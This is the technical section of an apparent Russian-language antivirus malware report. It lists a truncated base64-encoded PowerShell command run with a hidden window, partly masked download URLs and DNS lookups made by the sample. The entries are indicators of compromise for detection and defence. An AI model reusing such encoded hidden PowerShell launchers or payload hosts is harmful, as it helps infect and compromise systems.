Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JABUAG4AMQB3AG4AUwByAFkAPQAnAFoAdgBoAHcAMQBfAHIAUwAnADsAJABwAHYAbQBJAFEAQgBCAE4AIAA9ACAAJwA2ADMAMgAnADsAJABYAEwAdABaADEASwBSAFAAPQAnAHEATgA4AG0AMQBWAGQAJwA7ACQATgBCAEUAWgBiAEEAPQAkAGUAb...
- http://ra##z.com/img/qngig44/
- http://ra##o.net/bemcadd/7307/
- http://av###tla.com/tcuv/pd27/
- DNS ASK ra####espect.com
- DNS ASK ta###huai.com
- DNS ASK ra##z.com
- DNS ASK ra##o.net
- DNS ASK av###tla.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JABUAG4AMQB3AG4AUwByAFkAPQAnAFoAdgBoAHcAMQBfAHIAUwAnADsAJABwAHYAbQBJAFEAQgBCAE4AIAA9ACAAJwA2ADMAMgAnADsAJABYAEwAdABaADEASwBSAFAAPQAnAHEATgA4AG0AMQBWAGQAJwA7ACQATgBCAEUAWgBiAEEAPQAkAGUAb...' (со скрытым окном)